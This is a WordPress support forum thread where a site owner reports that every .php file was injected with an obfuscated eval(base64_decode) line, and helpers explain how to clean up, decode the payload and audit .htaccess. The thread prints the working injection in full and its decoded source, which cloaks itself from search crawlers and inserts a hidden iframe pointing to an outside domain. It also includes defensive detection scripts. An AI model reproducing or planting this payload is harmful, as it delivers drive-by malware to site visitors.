Support » Fixing WordPress » eval(base64_decode HACKED

  • Resolved alisamazing

    (@alisamazing)


    guys,

I’m having a nightmare. I’ve just had a look at my dashboard and it doesn’t look right… everything is there but it is not styled. I then looked at the code via the Appearance > Editor option and noticed that every single .php file has been altered by the “eval(base64_decode” etc.
    Here is what it looks like:

    <?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gJzxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmV2YWwodW5lc2NhcGUoIiU2NCU2RiU2MyU3NSU2RCU2NSU2RSU3NCUyRSU3NyU3MiU2OSU3NCU2NSUyOCUyNyUzQyU2OSU2NiU3MiU2MSU2RCU2NSUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2MiU2OSU2MiU3QSU2RiU3MCU2QyUyRSU2MyU2RiU2RCUyRiU2OSU2RSUyRSU3MCU2OCU3MCUyMiUyMCU3NyU2OSU2NCU3NCU2OCUzRCUzMSUyMCU2OCU2NSU2OSU2NyU2OCU3NCUzRCUzMSUyMCU2NiU3MiU2MSU2RCU2NSU2MiU2RiU3MiU2NCU2NSU3MiUzRCUzMCUzRSUzQyUyRiU2OSU2NiU3MiU2MSU2RCU2NSUzRSUyNyUyOSUzQiIpKTwvc2NyaXB0Pic7ICAgICAgfSAgICAgIHJldHVybiAiIjsgICAgIH0gICAgfSAgICAgICAgaWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ICAgICBmdW5jdGlvbiBnemRlY29kZSgkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDKXsgICAgICAkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEPUBvcmQoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLDMsMSkpOyAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9MTA7ICAgICAgJFJBM0Q1MkU1MkE0ODkzNkNERTBGNTM1NkJCMDg2NTJGMj0wOyAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmNCl7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9QHVucGFjaygndicsc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMTAsMikpOyAgICAgICAkUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCPSRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUJbMV07ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkrPTIrJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQjsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY4KXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT1Ac3RycG9zKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsY2hyKDApLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKzE7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmMTYpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYyKXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MjsgICAgICB9ICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz1AZ3ppbmZsYXRlKEBzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSk7ICAgICAgaWYoJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz09PUZBTFNFKXsgICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz0kUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDOyAgICAgIH0gICAgICByZXR1cm4gJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1MzsgICAgIH0gICAgfSAgICBmdW5jdGlvbiBtcm9iaCgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKXsgICAgIEhlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyAgICAgJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERT1nemRlY29kZSgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKTsgICAgICAgaWYocHJlZ19tYXRjaCgnL1w8XC9ib2R5L3NpJywkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFKSl7ICAgICAgcmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPFwvYm9keVteXD5dKlw+KS9zaScsZ21sKCkuIlxuIi4nJDEnLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpOyAgICAgfWVsc2V7ICAgICAgcmV0dXJuICRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUuZ21sKCk7ICAgICB9ICAgIH0gICAgb2Jfc3RhcnQoJ21yb2JoJyk7ICAgfSAgfQ=="));?>

    That is the first line in every .php file.

    My site doesn’t look to be affected: crazycreatures.org
    I always keep up to date with WordPress; I run 2.9.1
    I use the Atahualpa Theme (could this be the cause?)

    What steps do I take on WordPress? (I have already exported an XML today)
    What steps do I take on my host (godaddy.com)?

    I read somewhere that I need to back up databases and stuff. I am not familiar with code and stuff; can someone please advise in baby steps? Also it seems other people had a similar issue with this code on their PermaLinks; mine look fine.

    Any advice whatsoever greatly appreciated.

    Thanks

Viewing 12 replies - 1 through 12 (of 12 total)
  • argh….I hate that! You are in for a bit of a long day…
    http://codex.wordpress.org/FAQ_My_site_was_hacked
    http://ocaoimh.ie/did-your-wordpress-site-get-hacked/
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    http://www.snipe.net/2010/01/when-wordpress-gets-hacked/

    And when you’re done:
    http://codex.wordpress.org/Hardening_WordPress

    That reading will help you out. You need to delete the gibberish from your wp-config file. Reinstall WP (you might still be able to do it from your admin dashboard if you are lucky; if not, do a manual install). Once you have the new WP in place, delete all plugins and reinstall from clean downloads. Then reinstall your theme(s). If you have a heavily customized theme with no backup, you have to manually clean each file.

    That will get your WP clean. Then change ALL passwords (wp, db, ftp)

    Then you need to find out how this is happening. If you have godaddy, you have access to your server access logs. Look at the timestamp on a PHP file that was hacked. Now look at your server logs at that time/date and see how your files were accessed. Chances are, your logs will lead you to a rogue php file, or maybe more than one. Delete any files that don’t belong.

    And finally, if you have any more php files on your server (besides WP) investigate them. They probably are all hacked and will need to be replaced or cleaned. Good luck!

    Thread Starter alisamazing

    (@alisamazing)

    Thanks for the swift reply RVoodoo

    I’m backing up MySQL databases now, it is a lot of work and very time consuming.

    Will it be possible to recreate my site exactly like it was before, or will there be noticeable differences as far as the visitor is concerned? Also, I imagine all this will require resubmitting sitemaps and such to Google Analytics etc.?

    Will let you know how it turns out.

    Thanks

    You should be able to get things just the way they were. If you are lucky, your database did not get harmed. Just make sure you are very thorough. If you miss something, you may find yourself doing all this again in a week.

    Also, once all is clean….keep backups of all files, and of your DB….that way in the future, if something goes south, you can just delete all the harmed stuff and use your clean copies.

    so what does the above code do exactly?

    here it is decoded:

    if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){
        $GLOBALS['mr_no']=1;
        if(!function_exists('mrobh')){
            if(!function_exists('gml')){
                // Returns the injected <script> unless the visitor looks like a Google or Yahoo crawler
                function gml(){
                    if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){
                        // The forum stripped the HTML here; restored from the base64 in the first post.
                        // The unescape() string decodes to:
                        //   document.write('<iframe src="http://bibzopl.com/in.php" width=1 height=1 frameborder=0></iframe>');
                        return '<script language="javascript">eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%62%69%62%7A%6F%70%6C%2E%63%6F%6D%2F%69%6E%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B"))</script>';
                    }
                    return "";
                }
            }
            if(!function_exists('gzdecode')){
                // Hand-rolled gzip decoder for PHP builds without gzdecode(): reads the header flag byte,
                // skips the optional header fields, then gzinflate()s the remainder
                function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){
                    $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1));
                    $RBE4C4D037E939226F65812885A53DAD9=10;
                    $RA3D52E52A48936CDE0F5356BB08652F2=0;
                    if($R30B2AB8DC1496D06B230A71D8962AF5D&4){
                        $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2));
                        $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1];
                        $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB;
                    }
                    if($R30B2AB8DC1496D06B230A71D8962AF5D&8){
                        $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
                    }
                    if($R30B2AB8DC1496D06B230A71D8962AF5D&16){
                        $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
                    }
                    if($R30B2AB8DC1496D06B230A71D8962AF5D&2){
                        $RBE4C4D037E939226F65812885A53DAD9+=2;
                    }
                    $R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9));
                    if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){
                        $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C;
                    }
                    return $R034AE2AB94F99CC81B389A1822DA3353;
                }
            }
            // Output-buffer callback: decompresses the finished page if it was gzipped,
            // then splices the injected script in just before </body> (or at the end if there is none)
            function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){
                Header('Content-Encoding: none');
                $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);
                if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){
                    // The forum also stripped the [^\>] from this pattern; restored from the base64 above
                    return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE);
                }else{
                    return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml();
                }
            }
            ob_start('mrobh');
        }
    }
    Formatted version: http://wordpress.pastebin.ca/1791392
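    An added example, not samboll's decode or any code from the thread: a small scanner that finds `eval(base64_decode("..."))` in a PHP file's source, decodes the payload so it can be read the way the post above reads it, lists the tell-tale calls in the decoded text, and strips the one-line wrapper that the first post shows prepended to every file. The sample file and payload are constructed (the payload only sets a flag and registers an output-buffer callback); the curly quotes in the regex are there because forum copies of the code, like the one in the first post, arrive with them.

```python
import base64
import re

# Either straight or curly quotes around the base64 string, since copies pasted
# through a forum or word processor often carry curly ones.
QUOTE = "['\"\u201c\u201d]"
INJECT_RE = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*" + QUOTE + r"([A-Za-z0-9+/=\s]+)" + QUOTE + r"\s*\)\s*\)"
)
# The complete one-line wrapper the thread shows at the top of each .php file.
WRAPPER_RE = re.compile(r"<\?php\s*/\*\*/\s*" + INJECT_RE.pattern + r"\s*;\s*\?>[ \t]*\r?\n?")

# Calls that, inside a decoded payload, point at output tampering or a second decoding stage.
INDICATORS = ("ob_start", "HTTP_USER_AGENT", "gzinflate", "preg_replace",
              "<script", "<iframe", "unescape(", "eval(")

# Constructed sample payload and file (not the thread's real one).
_SAMPLE_PAYLOAD = "if(!isset($GLOBALS['mr_no'])){ $GLOBALS['mr_no']=1; ob_start('mrobh'); }"
SAMPLE_PHP = (
    '<?php /**/ eval(base64_decode("'
    + base64.b64encode(_SAMPLE_PAYLOAD.encode()).decode()
    + '"));?>\n'
    "<?php\n/* Theme header (constructed) */\nget_header();\n"
)


def decode_payload(b64):
    """Decode a base64 string that may contain line breaks (as a forum line-wrap would add)."""
    raw = base64.b64decode(re.sub(r"\s+", "", b64))
    return raw.decode("utf-8", errors="replace")


def find_injections(php_source):
    """Return one record per eval(base64_decode(...)) found: where it is, the decoded text, and its indicators."""
    hits = []
    for m in INJECT_RE.finditer(php_source):
        decoded = decode_payload(m.group(1))
        hits.append({
            "line": php_source.count("\n", 0, m.start()) + 1,
            "decoded": decoded,
            "indicators": [name for name in INDICATORS if name in decoded],
        })
    return hits


def strip_injection(php_source):
    """Remove the prepended wrapper line; the rest of the file is returned untouched."""
    return WRAPPER_RE.sub("", php_source, count=1)


if __name__ == "__main__":
    for hit in find_injections(SAMPLE_PHP):
        print(f"line {hit['line']}: indicators {hit['indicators']}")
        print(hit["decoded"])
    print("--- cleaned file ---")
    print(strip_injection(SAMPLE_PHP))
```

    Run it over every .php file under the site root (theme, plugins and wp-config.php included, since the thread notes wp-config.php is not replaced by a reinstall) and read each decoded payload before trusting the stripped file; a payload that itself contains `eval(` or `gzinflate` has another layer to decode.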

    Thread Starter alisamazing

    (@alisamazing)

    I noticed that ‘samboll’ had this in the decode

    } } if(!function_exists('gzdecode')){ function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){

    Before I posted here I thought a reinstall of 2.9.1 might help. So I did this via the Dashboard automatically. It told me the reinstall was successful, however it had a Warning.

    Warning: gzuncompress() [function.gzuncompress]: data error in /home/content/81/5291081/html/wp-includes/http.php on line 1825

    I guess this will be related??

    It is most likely related to the hack…yes.

    Last time I cleaned up, I had to reinstall WP….that got things working pretty well. Then reinstalled my theme and plugins which got rid of all warnings (My dashboard still looked bad, until I did a browser refresh ctrl+f5). Then I cleaned up my wp-config, as that file doesn’t get replaced on an upgrade and still had the dirty code in it…..

    After that all was well…..

    Thread Starter alisamazing

    (@alisamazing)

    Okay guys, thanks for your help so far, It looks a lot cleaner now and haven’t seen any strange behaviour but following the info here:
    http://ocaoimh.ie/did-your-wordpress-site-get-hacked/

    I checked my .htaccess file.

    Apparently it should be:

    # BEGIN WordPress
    <ifmodule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </ifmodule>
    # END WordPress

    Mine is:

    rewriteengine on

    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>

    # END WordPress
    rewritecond %{REQUEST_FILENAME} !-f
    rewritecond %{REQUEST_FILENAME} !-d
    rewriterule . /index.php [L]

    Can I get rid of that rewrite stuff (with lowercase r)?

    Thanks all.

    I think I would delete the .htaccess entirely and then regenerate your permalinks with the same settings you have:
    Admin – Settings – Permalinks
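    An added check for the .htaccess question above (not code from the thread or from WordPress): it lists every directive that sits outside the `# BEGIN WordPress` / `# END WordPress` markers, which is the only region WordPress writes when permalinks are regenerated, and separately flags rewrite conditions keyed on the visitor's user agent or referrer, or rules that send traffic to another host. The sample file is a copy of the one posted above; the two flagging heuristics are this example's own assumptions, not something the thread states.

```python
import re

BEGIN_MARK, END_MARK = "# BEGIN WordPress", "# END WordPress"

# Heuristics (assumptions of this example): conditions on who the visitor is, or rules
# redirecting off-site, are not part of a stock WordPress .htaccess and deserve a look.
COND_ON_VISITOR = re.compile(r"^RewriteCond\s+%\{(HTTP_USER_AGENT|HTTP_REFERER)\}", re.I)
RULE_TO_EXTERNAL = re.compile(r"^RewriteRule\s+\S+\s+https?://", re.I)

# Copy of the .htaccess posted in the thread.
SAMPLE_HTACCESS = """\
rewriteengine on

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress
rewritecond %{REQUEST_FILENAME} !-f
rewritecond %{REQUEST_FILENAME} !-d
rewriterule . /index.php [L]
"""


def audit_htaccess(text):
    """Return directives outside the WordPress markers, how many marker blocks exist, and suspect lines."""
    outside, suspect, blocks, inside = [], [], 0, False
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if line == BEGIN_MARK:
            inside, blocks = True, blocks + 1
            continue
        if line == END_MARK:
            inside = False
            continue
        if not line or line.startswith("#"):
            continue  # blank lines and comments carry no directive
        if not inside:
            outside.append((lineno, line))
        if COND_ON_VISITOR.match(line) or RULE_TO_EXTERNAL.match(line):
            suspect.append((lineno, line))
    return {"outside": outside, "blocks": blocks, "suspect": suspect}


if __name__ == "__main__":
    report = audit_htaccess(SAMPLE_HTACCESS)
    print(f"{report['blocks']} WordPress block(s)")
    for lineno, line in report["outside"]:
        print(f"outside markers, line {lineno}: {line}")
    for lineno, line in report["suspect"]:
        print(f"suspect, line {lineno}: {line}")
```

    Apache reads directive names case-insensitively, so the lowercase `rewritecond` lines in the sample are live rules, not dead text; anything reported as outside the markers that you did not add yourself is a candidate for removal, which is what deleting the file and regenerating the permalinks achieves.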

    I did a search on <?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZ and found this in Google Cache. Looks like the same code:

    http://74.125.95.132/search?q=cache:tL9ahEm5aqwJ:moodle.org/mod/forum/discuss.php%3Fd%3D111453+%3C%3Fphp+/**/+eval%28base64_decode%28%22aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZ&cd=1&hl=en&ct=clnk&gl=us

    Have you tried installing the antivirus WP plugin? You can do a manual scan of your theme templates to help identify the code. If not, you can download it here: http://wordpress.org/extend/plugins/antivirus/

    Hi Samuel, I saw you helped a lot of people decoding the footer.

    I read lots of articles on how to decode, but I can’t do it. Would you be so kind as to decode my footer please?

    And could you tell me then how you did it?

    thanks

    [Code moderated as per the Forum Rules. Please use the pastebin]

    There are a number of them on the web. Try this one:
    http://www.tareeinternet.com/scripts/decrypt.php
    or Google for: base64 decoder

  • The topic ‘eval(base64_decode HACKED’ is closed to new replies.